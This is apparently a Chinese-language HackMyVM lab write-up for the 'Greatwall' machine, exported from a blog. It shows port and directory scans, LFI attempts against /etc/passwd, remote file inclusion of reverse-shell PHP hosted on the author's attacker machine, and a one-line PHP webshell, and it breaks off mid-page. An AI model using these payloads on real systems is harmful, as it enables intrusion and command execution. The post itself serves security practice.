{"id":891,"date":"2025-06-19T01:03:57","date_gmt":"2025-06-18T17:03:57","guid":{"rendered":"http:\/\/162.14.82.114\/?p=891"},"modified":"2025-06-19T01:03:57","modified_gmt":"2025-06-18T17:03:57","slug":"hmv-_-greatwall","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/891\/06\/19\/2025\/","title":{"rendered":"hmv[-_-]Greatwall"},"content":{"rendered":"<h1>Greatwall<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103364.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250617231952169\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103366.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103366.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618075004317\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ nmap -sT -T4 -sC -sV $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-17 19:52 EDT\nNmap scan report for 192.168.10.129\nHost is up (0.00099s latency).\nNot shown: 998 filtered tcp ports (no-response)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:8c:5a:5a:8b:43:a1:27:81:13:ff:b6:be:b5:c6:e5 (ECDSA)\n|_  256 e4:73:84:da:df:18:e2:f2:db:5e:11:93:b5:d9:54:74 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.62 ((Debian))\n|_http-title: Hello World\n|_http-server-header: Apache\/2.4.62 (Debian)\nMAC Address: 00:0C:29:A5:9B:0B (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 28.84 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ dirsearch -u http:\/\/192.168.10.129\/ 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )                                                                                                                                                                                 \nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/Greatwall\/reports\/http_192.168.10.129\/__25-06-17_20-02-58.txt\n\nTarget: http:\/\/192.168.10.129\/\n\n[20:02:58] Starting:                                                                                                                                                                                    \n[20:02:59] 403 -  279B  - \/.ht_wsr.txt                                      \n[20:02:59] 403 -  279B  - \/.htaccess.orig                                   \n[20:02:59] 403 -  279B  - \/.htaccess.sample\n[20:02:59] 403 -  279B  - \/.htaccess.save\n[20:02:59] 403 -  279B  - \/.htaccess_extra                                  \n[20:02:59] 403 -  279B  - \/.htaccess_sc                                     \n[20:02:59] 403 -  279B  - \/.htaccess.bak1                                   \n[20:02:59] 403 -  279B  - \/.htaccessBAK\n[20:02:59] 403 -  279B  - \/.htaccess_orig\n[20:02:59] 403 -  279B  - \/.htaccessOLD\n[20:02:59] 403 -  279B  - \/.htaccessOLD2\n[20:03:00] 403 -  279B  - \/.htm                                             \n[20:03:00] 403 -  279B  - \/.html                                            \n[20:03:00] 403 -  279B  - \/.htpasswd_test                                   \n[20:03:00] 403 -  279B  - \/.htpasswds\n[20:03:00] 403 -  279B  - \/.httr-oauth\n[20:03:00] 403 -  279B  - \/.php                                             \n[20:03:11] 404 -   16B  - \/composer.phar                                    \n[20:03:22] 404 -   16B  - \/php-cs-fixer.phar                                \n[20:03:23] 404 -   16B  - \/phpunit.phar                                     \n[20:03:26] 403 -  279B  - \/server-status                                    \n[20:03:26] 403 -  279B  - \/server-status\/\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.10.129\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.129\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,html,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 3193]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/.php                 (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103367.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103367.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618080024126\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103368.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103368.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618080049456\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u662f<code>GET<\/code>\u4f20\u53c2\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=https%3A%2F%2Fwww.baidu.com<\/code><\/pre>\n<h3>RFI(\u8bd5\u9519)<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u672c\u5730\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.129\/?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd&quot; | html2text\nAcross the Great Wall we can reach every corner in the world\n[page                ]\nnonono~\n<\/code><\/pre>\n<p>\u53ef\u80fd\u6709\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u7f16\u7801\u5b57\u7b26\u518d\u5c1d\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\"># php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n# php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%2Fresource%3D%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ curl -s &quot;http:\/\/192.168.10.129\/index.php?page=php%3A%2F%2Ffilter%2Fconvert%2Ebase64%2Dencode%2Fresource%3D%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd&quot; | html2text\nAcross the Great Wall we can reach every corner in the world\n[page                ]\nnonono~<\/code><\/pre>\n<p>\u96be\u9053\u662fRFI\uff1f\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># http:\/\/192.168.10.128:8888\/revshell.php\nhttp:\/\/192.168.10.129\/?page=http%3A%2F%2F192%2E168%2E10%2E128%3A8888%2Frevshell%2Ephp<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u5f00\u59cb\u52a0\u8f7d\uff0c\u8fc7\u4e86\u4e00\u4f1a\u5e76\u672a\u53d1\u73b0shell\u6709\u8bf7\u6c42\u53d1\u8fc7\u6765\uff0c\u4e0b\u9762\u7684\u8bf7\u6c42\u662f\u6211\u4e3b\u673a\u8fdb\u884c\u6d4b\u8bd5\u7684\u7ed3\u679c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103369.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103369.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618081831592\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5b9a\u4f4d\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103370.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103370.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618083130745\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http%3A%2F%2F127.0.0.1%2Findex.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103371.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103371.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618090102104\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5e94\u8be5\u662f\u53ef\u4ee5\u5305\u542b\u672c\u5730\u6587\u4ef6\u5e76\u89e3\u6790\u7684\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\u6587\u4ef6\uff0c\u4f46\u662f\u5c31\u662f\u8bf7\u6c42\u4e0d\u5230\uff0c\u4e0d\u77e5\u9053\u5565\u60c5\u51b5\uff0c\u96be\u9053\u5141\u8bb8 put \u4e0a\u4f20\uff1f<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ rustscan -a 192.168.10.129 -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nYou miss 100% of the ports you don&#039;t scan. - RustScan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.129:22\nOpen 192.168.10.129:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:8c:5a:5a:8b:43:a1:27:81:13:ff:b6:be:b5:c6:e5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKRu5jciIdNNmfTqr0lMfefa78S29x6BomOO1L4LTfrFsfTOU1UWH6rMhYOO6\/lwUi6D16FBbDL7I3RciwoyX8w=\n|   256 e4:73:84:da:df:18:e2:f2:db:5e:11:93:b5:d9:54:74 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILXqxoPabwLw5VBYwTrRzVaoDU7Z1YHyzSNLVwV3v3xO\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.62 (Debian)\n|_http-title: Hello World\nMAC Address: 00:0C:29:A5:9B:0B (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u53d1\u73b0\u4e5f\u4e0d\u80fd\u8fdb\u884c put \u4e0a\u4f20\uff0c\u8fd8\u662f\u5f97\u5c1d\u8bd5\u8fdc\u7a0b\u5305\u542b\uff1a<\/p>\n<pre><code class=\"language-bash\"># http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128:8888\/shell.txt%00\nhttp:\/\/192.168.10.129\/?page=http%3A%2F%2F192%2E168%2E10%2E128%3A8888%2Fshell%2Etxt\n# nonono~\nhttp:\/\/192.168.10.129\/?page=http%253A%252F%252F192%252E168%252E10%252E128%253A8888%252Fshell%252Etxt\n# nonono~<\/code><\/pre>\n<p>\u90fd\u4e0d\u884c\uff0c\u7a81\u7136\u8ba9\u6211\u60f3\u8d77\u4e86<code>boxing<\/code>\u90a3\u4e2a\u9776\u673a\uff0c\u5c1d\u8bd5\u4e00\u4e0bbasic\u8ba4\u8bc1\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http:\/\/127.0.0.1:kali@192.168.10.128:8888\/revshell.php<\/code><\/pre>\n<p>\u4f46\u662f\u4e5f\u4e0d\u884c\u6b38\u3002\u3002\u3002\u3002\u7136\u540e\u5c31\u662f\u6162\u6162\u5c1d\u8bd5\uff0c\u76f4\u5230\u6211\u628a\u7aef\u53e3\u6539\u4e3a\u4e86<code>80<\/code>.\u3002\u3002\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http:\/\/192.168.10.128\/shell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103372.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103372.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618102657838\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103373.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103373.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618102639349\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u672c\u5730\u5305\u542b\u8fdb\u884c\u53cd\u5f39\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.129\/?page=http:\/\/127.0.0.1\/shell.php<\/code><\/pre>\n<p>\u4f46\u662f\u53d1\u73b0\u4e0d\u884c\u6b38\u3002\u3002\u3002\u3002\u7814\u7a76\u4e0b\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-bash\">WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5173\u95ed\u9632\u706b\u5899\u3002\u3002\u3002\u3002\u3002\u4f46\u662f\u4ecd\u7136\u4e0d\u884c\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u4fee\u6539\u6587\u4ef6\u540e\u7f00\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e5f\u4e0d\u884c\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103374.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103374.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618111720468\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103375.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103375.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618111732718\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u60f3\u8d77\u4e4b\u524d\u4e0d\u77e5\u9053\u662f\u9650\u5236\u4e86\u5f00\u653e\u7aef\u53e3\u8fd8\u662f\u957f\u5ea6\u5931\u8d25\u4e86\uff0c\u6240\u4ee5\u8fd9\u91cc\u6539\u4e3a\u4e00\u53e5\u8bddshell\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ cat webshell.php \n&lt;?php system($_GET[&quot;cmd&quot;]) ;?&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103376.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103376.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618134757669\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103377.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103377.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618134807084\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6ca1\u6709\u62a5\u9519\u4e86\uff0c\u4f46\u662f\u8fd8\u662f\u8bfb\u53d6\u4e0d\u5230\uff0c\u6539\u4e3a<code>GIF89a<\/code>\u548c<code>.jpg<\/code>\u540e\u7f00\u6709\u4e86\u65b0\u7684\u56de\u663e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103378.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103378.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250618135855405\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u4e0a\u4f20\u6210\u529f\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103379.png'><img class=\"lazyload lazyload-style-2\" 